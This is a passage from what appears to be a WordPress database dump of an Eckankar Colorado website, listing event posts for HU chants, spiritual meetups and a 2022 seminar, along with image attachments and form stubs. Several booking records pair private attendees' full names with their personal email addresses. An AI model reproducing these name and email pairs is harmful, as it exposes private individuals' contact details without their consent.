role=\"presentation\">ho</span><span dir=\"ltr\" role=\"presentation\">w</span> <span dir=\"ltr\" role=\"presentation\">dreams</span> <span dir=\"ltr\" role=\"presentation\">can</span> <span dir=\"ltr\" role=\"presentation\">give</span> <span dir=\"ltr\" role=\"presentation\">insights</span> <span dir=\"ltr\" role=\"presentation\">into</span> <span dir=\"ltr\" role=\"presentation\">your</span> <span dir=\"ltr\" role=\"presentation\">past</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">future</span></span><span id=\"page3R_mcid10\" class=\"markedContent\"><br>\r\n<span dir=\"ltr\" role=\"presentation\">•</span> <span dir=\"ltr\" role=\"presentation\">Discussion</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">refreshments</span></span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please join us for this special free discussion presented by the Spiritual Experiences Group of Pagosa Springs and sponsored by Eckankar, the Path of Spiritual Freedom. People of all faiths and beliefs are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The discussion will be held at the Pagosa Lakes Clubhouse, 240A Port Ave, Pagosa Springs, on Sunday, September 25th, and begins at 1:00 PM.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/288422526/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'The Art of Spiritual Dreaming\'','','publish','closed','closed','','meetup-in-person-template','','','2022-09-13 11:16:15','2022-09-13 17:16:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267211',0,'mec-events','',0),(267212,2,'2022-09-13 10:57:46','2022-09-13 16:57:46','','create-dreams-1','','inherit','closed','closed','','create-dreams-1','','','2022-09-13 10:57:46','2022-09-13 16:57:46','',267211,'https://eckankar-colorado.org/wp-content/uploads/2022/09/create-dreams-1.jpg',0,'attachment','image/jpeg',0),(267214,0,'2022-09-13 14:22:16','2022-09-13 20:22:16','','','','publish','closed','closed','','267214','','','2022-09-13 14:22:16','2022-09-13 20:22:16','',0,'https://eckankar-colorado.org/nf_sub/267214/',0,'nf_sub','',0),(267217,2,'2022-09-14 12:23:17','2022-09-14 18:23:17','','fall-leaves-close-9','','inherit','closed','closed','','fall-leaves-close-9','','','2022-09-14 12:23:17','2022-09-14 18:23:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/09/fall-leaves-close-9.jpg',0,'attachment','image/jpeg',0),(267219,2,'2022-09-14 14:11:04','2022-09-14 20:11:04','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are facilitated by an ECK Spiritual Aide, a cleric and longtime member of Eckankar who is specially trained to lead these forums.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></strong></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'Become a Light to the World\'','','publish','closed','closed','','roundtable-discussion-in-personbecome-a-light-to-the-world','','','2022-09-14 14:13:34','2022-09-14 20:13:34','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267219',0,'mec-events','',0),(267220,2,'2022-09-14 14:10:06','2022-09-14 20:10:06','','nature-bench-light-1','','inherit','closed','closed','','nature-bench-light-1','','','2022-09-14 14:10:06','2022-09-14 20:10:06','',267219,'https://eckankar-colorado.org/wp-content/uploads/2022/09/nature-bench-light-1.jpg',0,'attachment','image/jpeg',0),(267222,2,'2022-09-14 14:18:50','2022-09-14 20:18:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the March 2022 edition of \'<em>The Mystic </em><em>World</em>.\'</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please have your copy of this issue on hand at the meeting.&nbsp;&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>You can find the login information for this event in the current issue of the Members Newsletter.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion - Online','','publish','closed','closed','','mystic-world-discussion','','','2022-09-14 14:24:03','2022-09-14 20:24:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267222',0,'mec-events','',0),(267223,2,'2022-09-14 14:18:13','2022-09-14 20:18:13','','sunset-shell-1','','inherit','closed','closed','','sunset-shell-1','','','2022-09-14 14:18:13','2022-09-14 20:18:13','',267222,'https://eckankar-colorado.org/wp-content/uploads/2022/09/sunset-shell-1.jpg',0,'attachment','image/jpeg',0),(267226,1000015,'2022-09-18 11:45:00','2022-09-18 17:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-9','','','2022-09-18 11:45:00','2022-09-18 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267226',0,'mec-books','',0),(267227,1000044,'2022-09-18 11:45:00','2022-09-18 17:45:00','','Colleyna Danler - colleynadanler@hotmail.com','','publish','closed','closed','','colleyna-danler-colleynadanlerhotmail-com-2','','','2022-09-18 11:45:00','2022-09-18 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267227',0,'mec-books','',0),(267228,1000014,'2022-09-18 11:45:00','2022-09-18 17:45:00','','kery colvin - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com-3','','','2022-09-18 11:45:00','2022-09-18 17:45:00','',0,'https://eckankar-colorado.org/mec-books/kery-colvin-keanchicoyahoo-com-3/',0,'mec-books','',0),(267229,0,'2022-09-18 14:13:34','2022-09-18 20:13:34','','','','publish','closed','closed','','267229','','','2022-09-18 14:13:34','2022-09-18 20:13:34','',0,'https://eckankar-colorado.org/nf_sub/267229/',0,'nf_sub','',0),(267230,2,'2022-09-18 21:26:02','2022-09-19 03:26:02','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body.</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"> HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: disc;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by discussion groups, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n<br>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;</span></strong><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-5','','','2022-09-18 21:28:34','2022-09-19 03:28:34','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267230',0,'mec-events','',0),(267231,2,'2022-09-18 21:47:35','2022-09-19 03:47:35','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\" style=\"color: #a68a11; font-weight: 600;\" data-font-weight=\"600\"><span style=\"font-size: 18pt;\">TAKE A QUANTUM LEAP FORWARD SPIRITUALLY!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You’re invited to a transformational event—the 2022 Eckankar Soul Adventure Seminar, October 21-23. Its theme: “Become a Light to the World.”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Embrace your highest spiritual destiny in this lifetime. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Hear uplifting talks and heart-opening musical performances. You can join in dynamic workshops and discussion circles, where you’ll find new ways to shine your unique light in the world.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The highlight of the event is a special address from Sri Harold Klemp, the spiritual leader of Eckankar. Inspiring, engaging, and warmly relatable, he speaks directly to Soul, awakening the divine knowledge that is already within your heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">An inspiring journey awaits you!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">New to Eckankar? Be our guest. Enjoy complimentary registration.</span></p>\r\n<p class=\"\"><span dir=\"ltr\" style=\"font-size: 14pt;\" role=\"presentation\">The 2022 ECKANKAR Soul Adventure Seminar takes place October 21–23, </span><span dir=\"ltr\" style=\"font-size: 14pt;\" role=\"presentation\">at the Minneapolis Convention Center, 1301 Second Avenue South, Minneapolis, MN 55403</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Register today at <a class=\"link\" href=\"http://ECKseminars.org\" target=\"_blank\" rel=\"noopener ugc\">ECKseminars.org</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.facebook.com/hashtag/eckankar?__eep__=6&amp;__cft__%5b0%5d=AZVy_Sb6ggncoeYZMVMn8EeXgbo5jliJJYJs7y4e6eC3_iumdcmR3tm9R-XIjHU4jj26ThF-2scmGIote5ulg7Aq_fREPVoFCH7rtqp5gnZG4GflX0VNk1avhAHmPRxnOpvD8k8kc1HyOmFgLBZTDG4O&amp;__tn__=q\" target=\"_blank\" rel=\"noopener ugc\">#ECKANKAR</a> <a class=\"link\" href=\"https://www.facebook.com/hashtag/ecksouladventure?__eep__=6&amp;__cft__%5b0%5d=AZVy_Sb6ggncoeYZMVMn8EeXgbo5jliJJYJs7y4e6eC3_iumdcmR3tm9R-XIjHU4jj26ThF-2scmGIote5ulg7Aq_fREPVoFCH7rtqp5gnZG4GflX0VNk1avhAHmPRxnOpvD8k8kc1HyOmFgLBZTDG4O&amp;__tn__=q\" target=\"_blank\" rel=\"noopener ugc\">#ECKSoulAdventure</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','2022 Eckankar Soul Adventure Seminar<br>In Minneapolis Minnesota<br>\'Become a Light to the World\'','','publish','open','closed','','2022-eckankar-soul-adventure-seminar-in-minneapolis-minnesotabecome-a-light-to-the-world','','','2022-09-19 21:29:55','2022-09-20 03:29:55','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267231',0,'mec-events','',0),(267233,2,'2022-09-18 21:49:42','2022-09-19 03:49:42','','2022-esc-oct-soul-adv-2','','inherit','closed','closed','','2022-esc-oct-soul-adv-2','','','2022-09-18 21:49:42','2022-09-19 03:49:42','',267231,'https://eckankar-colorado.org/wp-content/uploads/2022/09/2022-esc-oct-soul-adv-2.jpg',0,'attachment','image/jpeg',0),(267237,2,'2022-09-19 21:08:58','2022-09-20 03:08:58','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Have you ever reached out to the universe for love and answers?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you need help dealing with stress or fear?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you want to know how to tap into the source of all healing?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this event is for you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU is a universal love song to God. It works for all. It brings alignment with your true purpose and highest good. It will attune you to the wonders of God\'s unconditional love for Soul - for you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em> </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n</strong></span><span style=\"font-size: 12pt;\"><em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>\'The Healing Sound of HU\'','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinethe-healing-sound-of-hu','','','2022-09-19 21:13:43','2022-09-20 03:13:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267237',0,'mec-events','',0),(267240,0,'2022-09-20 11:46:24','2022-09-20 17:46:24','','','','publish','closed','closed','','267240','','','2022-09-20 11:46:24','2022-09-20 17:46:24','',0,'https://eckankar-colorado.org/nf_sub/267240/',0,'nf_sub','',0),(267241,0,'2022-09-20 11:47:33','2022-09-20 17:47:33','','','','publish','closed','closed','','267241','','','2022-09-20 11:47:33','2022-09-20 17:47:33','',0,'https://eckankar-colorado.org/nf_sub/267241/',0,'nf_sub','',0),(267242,0,'2022-09-20 11:49:03','2022-09-20 17:49:03','','','','publish','closed','closed','','267242','','','2022-09-20 11:49:03','2022-09-20 17:49:03','',0,'https://eckankar-colorado.org/nf_sub/267242/',0,'nf_sub','',0),(267243,1000015,'2022-09-20 19:00:00','2022-09-21 01:00:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-10','','','2022-09-20 19:00:00','2022-09-21 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267243',0,'mec-books','',0),(267246,2,'2022-09-21 00:33:22','2022-09-21 06:33:22','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">[ninja_form id=60]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Recaptcha Test V3---ONLY--','','publish','closed','closed','','267246-2','','','2022-09-21 00:34:54','2022-09-21 06:34:54','',0,'https://eckankar-colorado.org/?page_id=267246',0,'page','',0),(267252,2,'2022-09-21 20:41:04','2022-09-22 02:41:04','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">This event will help you gain new perspectives on</span></strong></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">seeing heaven before you die</span></li>\r\n	<li><span style=\"font-size: 14pt;\">meeting with departed loved ones</span></li>\r\n	<li><span style=\"font-size: 14pt;\">near-death experiences</span></li>\r\n	<li><span style=\"font-size: 14pt;\">help from spiritual guides</span></li>\r\n	<li><span style=\"font-size: 14pt;\">and dealing with grief</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In the great cycle of birth, life and death, many people are uncertain about what happens after our physical existence ceases. Is there really such a thing as life after death? Can we gain experience of this journey of Soul—while still living in the physical world?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Understanding more about our true spiritual nature and our spiritual experiences can provide personal proof of Soul\'s eternal nature, and can answer questions as to what lies beyond this life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come explore the eternal, divine wonder of you!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for this spiritual discussion to share your own insights, learn from those of others, and try a spiritual exercise or two.</span></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Reference:</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\'<a href=\"https://www.amazon.com/Eck-Wisdom-Life-After-Death/dp/1570434387/ref=monarch_sidesheet\" target=\"_blank\" rel=\"noopener\"><em>ECK Wisdom on Life After Death</em></a>\', is a small booklet which will be referenced at the Meetup; it invites you to explore the internal nature of you!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/288631318/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>‘Life and Love After Death’ Discussion','','publish','closed','closed','','meetup-onlinelife-and-love-after-death-discussion','','','2022-09-21 20:56:50','2022-09-22 02:56:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267252',0,'mec-events','',0),(267256,2,'2022-09-21 20:54:51','2022-09-22 02:54:51','','5.0.2','5.0.2','inherit','closed','closed','','5-0-2','','','2022-09-21 20:54:51','2022-09-22 02:54:51','',267252,'https://eckankar-colorado.org/wp-content/uploads/2022/09/blue-white-connection-2.jpg',0,'attachment','image/jpeg',0),(267260,1000015,'2022-10-16 11:45:00','2022-10-16 17:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-11','','','2022-10-16 11:45:00','2022-10-16 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267260',0,'mec-books','',0),(267268,2,'2022-09-28 21:12:33','2022-09-29 03:12:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"><br>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 20pt;\">“Harmony in a family is a sacred thing\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp,<em>The Spiritual Life,&nbsp;</em>pg. 54</span></p>\r\n</blockquote>\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Our relationships with our family--children, partners, and even pets are a wonderful way to stretch ourselves and learn more about divine love. Even though we have the intention to create harmony within our family, we often need support to stay in balance and see how the Divine is working in every aspect of our lives. This support can come through others, by listening to the Holy Spirit, and having the spiritual tools to see our problems from a higher viewpoint.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this Meetup discussion we will share some of the techniques and concepts that help us create harmony in our family and nurture our relationships.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Some of the topics we will explore are:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">How to grow love in our family relationships</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Choosing love over power</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual techniques and ideas to deepen our relationship with our loved ones and with God</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the second in a series of three spiritual discussions especially for families. The next discussion is \'<em>Creative Ways to Grow Spiritually While Serving Your Family\'</em> to be held on Saturday, November 19. You are welcome to attend one or all</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You can also explore our Parents and Families resources at <a class=\"link\" href=\"https://www.eckankar.org/explore/parents-families/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Programs for Youth, Parents &amp; Families | ECKANKAR</a>.</span></p>\r\n</div>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/288755875/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Spiritual Tools & Techniques to Nurture Your Family Relationships\'','','publish','closed','closed','','meetup-onlinespiritual-tools-techniques-to-nurture-your-family-relationships','','','2022-09-28 21:26:27','2022-09-29 03:26:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267268',0,'mec-events','',0),(267269,2,'2022-09-28 21:13:54','2022-09-29 03:13:54','','fam-girls-3','','inherit','closed','closed','','fam-girls-3','','','2022-09-28 21:13:54','2022-09-29 03:13:54','',267268,'https://eckankar-colorado.org/wp-content/uploads/2022/09/fam-girls-3.jpg',0,'attachment','image/jpeg',0),(267280,0,'2022-10-04 15:02:12','2022-10-04 21:02:12','','','','publish','closed','closed','','267280','','','2022-10-04 15:02:12','2022-10-04 21:02:12','',0,'https://eckankar-colorado.org/nf_sub/267280/',0,'nf_sub','',0),(267283,0,'2022-10-05 12:42:48','2022-10-05 18:42:48','','','','publish','closed','closed','','267283','','','2022-10-05 12:42:48','2022-10-05 18:42:48','',0,'https://eckankar-colorado.org/nf_sub/267283/',0,'nf_sub','',0),(267291,0,'2022-10-07 08:19:29','2022-10-07 14:19:29','','','','publish','closed','closed','','267291','','','2022-10-07 08:19:29','2022-10-07 14:19:29','',0,'https://eckankar-colorado.org/nf_sub/267291/',0,'nf_sub','',0),(267292,0,'2022-10-07 12:38:17','2022-10-07 18:38:17','','','','publish','closed','closed','','267292','','','2022-10-07 12:38:17','2022-10-07 18:38:17','',0,'https://eckankar-colorado.org/nf_sub/267292/',0,'nf_sub','',0),(267300,1000048,'2022-10-09 10:30:00','2022-10-09 16:30:00','','Rhonda Miller - rhoann9@gmail.com','','publish','closed','closed','','rhonda-miller-rhoann9gmail-com','','','2022-10-09 10:30:00','2022-10-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267300',0,'mec-books','',0),(267301,1000049,'2022-10-09 10:30:00','2022-10-09 16:30:00','','Marcia Van Egmond - MVEpianist@gmail.com','','publish','closed','closed','','marcia-van-egmond-mvepianistgmail-com','','','2022-10-09 10:30:00','2022-10-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267301',0,'mec-books','',0),(267302,1000023,'2022-10-09 10:30:00','2022-10-09 16:30:00','','Bonnie G. - bngstreet@gmail.com','','publish','closed','closed','','bonnie-g-bngstreetgmail-com-2','','','2022-10-09 10:30:00','2022-10-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267302',0,'mec-books','',0),(267303,1000047,'2022-10-09 10:30:00','2022-10-09 16:30:00','','Beth - beth1848@yahoo.com','','publish','closed','closed','','beth-beth1848yahoo-com','','','2022-10-09 10:30:00','2022-10-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267303',0,'mec-books','',0),(267309,2,'2022-10-11 15:04:13','2022-10-11 21:04:13','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Loving and supporting our family members—children, partners and pets—is a unique spiritual adventure and could even be called a hero’s journey. We are stretched to grow spiritually and learn deeper levels of love. It helps to have support, inspiration, and spiritual tools to navigate this precious journey of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this discussion we will share ideas, spiritual tools, and inspiration to enrich our individual paths of spiritual growth, love, and service to ourselves and our families.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Some of the topics we will explore are:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\" style=\"border-width: 0px; line-height: 2em;\">\r\n	<li><span style=\"font-size: 14pt;\">Balancing family commitments and our own spiritual growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Loving ourselves and others as Soul, Divine sparks of God</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual techniques to find creative solutions to daily challenges and deepen our relationships with our loved ones and with God.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>. You can also explore our Parents and Families resources at <a class=\"link\" href=\"https://www.eckankar.org/explore/parents-families/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Programs for Youth, Parents &amp; Families | ECKANKAR</a>.</span></p>\r\n</div>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/289046334/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Creative Ways to Grow Spiritually While Serving Your Family\'','','publish','closed','closed','','meetup-onlinecreative-ways-to-grow-spiritually-while-serving-your-family','','','2022-10-11 15:10:14','2022-10-11 21:10:14','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267309',0,'mec-events','',0),(267310,2,'2022-10-11 15:03:09','2022-10-11 